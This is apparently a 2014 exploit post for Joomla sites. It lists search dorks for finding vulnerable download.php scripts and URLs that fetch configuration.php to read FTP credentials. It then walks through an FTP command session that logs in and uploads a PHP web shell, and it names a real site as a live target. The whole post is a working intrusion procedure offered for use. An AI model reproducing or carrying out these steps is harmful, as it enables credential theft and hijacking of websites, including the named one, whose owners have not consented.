Priv8 Exploit Upload Shell Via FTP CMD (Joomla)

1. ##################################################################################################
2. # Exploit Title: Priv8 Exploit Upload Shell Via FTP CMD (Joomla)
3. # Author: CoderSec
4. # Contact: https://www.facebook.com/profile.php?id=100004954872423
5. # Follow me on YOUTUBE : https://www.youtube.com/user/Dinz011
6. # Date: 25/07/2014
7. # Tested on : Windows
8. ###################################################################################################
9.  
10. Dork:
11. inurl:/download.php?file=
12. inurl:/force-download.php?file=
13. Explorer ur brain
14.  
15. Get Database :
16. ww.site.com/download.php?file=configuration.php
17. ww.site.com/force-download.php?file=configuration.php
18.  
19. Find FTP User And FTP Password On Database :
20. var $Ftp_User : 'user'
21. var $Ftp_pass : 'user'
22. var $Ftp_root : 'public_html'
23.  
24. Upload Shell via FTP CMD
25. 1. Open CMD
26. Example :
27. C:\Documents and Settings\USER> ftp site.com
28. to www.site.com
29. Connected to site.com
30. username : user
31. 331 Password Required for example
32. Password : password
33. user Loged in
34. ftp> ls
35. public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )
36. ftp>cd public_html
37. ftp> put "C:\CoderSec.php" << shell
38. Command Success
39. File Transfered
40.  
41. Shell Access :
42.  
43. www.site.com/CoderSec.php
44.  
45. Live Target :
46.  
47. http://hisardoot.co.il/ISD/knife%20..%20configuration.php
48.  
49. Ex : http://www8.0zz0.com/2014/07/25/09/326538625.jpg